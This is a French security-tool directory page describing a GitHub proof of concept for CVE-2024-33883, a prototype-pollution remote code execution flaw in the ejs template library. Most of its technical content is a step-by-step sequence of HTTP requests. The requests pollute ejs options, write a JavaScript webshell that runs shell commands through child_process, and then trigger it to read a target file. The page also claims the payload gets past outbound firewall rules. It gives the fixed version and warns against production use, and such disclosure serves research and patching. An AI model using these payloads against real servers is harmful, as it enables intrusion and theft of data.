Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2024-33883 — Preuve de concept de CVE-2024-33883, vulnérabilité d'exécution de code à distance (RCE) de ejs. | Kitploit
Outils/GitHubGitHub/grantzile/poc-cve-2024-33883
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubgrantzile/poc-cve-2024-33883

PoC-CVE-2024-33883

Preuve de concept de CVE-2024-33883, vulnérabilité d'exécution de code à distance (RCE) de ejs.

Voir le dépôt
52il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-33883

[email protected], Validation insuffisante de la pollution du prototype menant à une exploitation RCE

  • Avec la pollution du prototype, définir opts.client sur une valeur véridique (condition)
  • Ensuite, lorsque render() s'exécute, ejs exécutera la valeur de opts.escapeFunction comme code JS.

Plage de code vulnérable

Basé sur [email protected]

1. ejs/lib/ejs.js - lignes 580, 636, 637

PoC (Injecter un webshell et activer)

root@kitploit:~
1. GET /pollute?target=client&value=1

2. GET /pollute?target=escapeFunction&value=process.mainModule.require("fs").writeFileSync('./payload.js', "function RCE( key ){ \n const result = process.mainModule.require('child_process').execSync(`${key}`); \n throw new Error(`Result leak from Error: ${result.toString()}`); \n}\n module.exports = RCE;");

3. GET /
- Inject webshell

4. GET /pollute?target=escapeFunction&value=process.mainModule.require("./payload.js")("cat ./Leak_target");

5. GET /
- Activate webshell
  • Le PoC ci-dessus peut contourner la suppression des paquets sortants du pare-feu ufw.

  • Toutes les versions antérieures à 3.1.10 sont vulnérables à ce type d'attaque.

  • Il s'agit d'une vulnérabilité RCE, ne pas abuser sur un serveur en production.

Condition d'attaque possible

  1. Nécessite le contrôle de render().
  2. Nécessite le contrôle du vecteur d'attaque de pollution du prototype.
  • Si les deux conditions ci-dessus sont remplies, l'attaque RCE est possible.

Comment prévenir cette attaque ?

  • La version corrigée ([email protected]) est désormais disponible.
Télécharger l’outil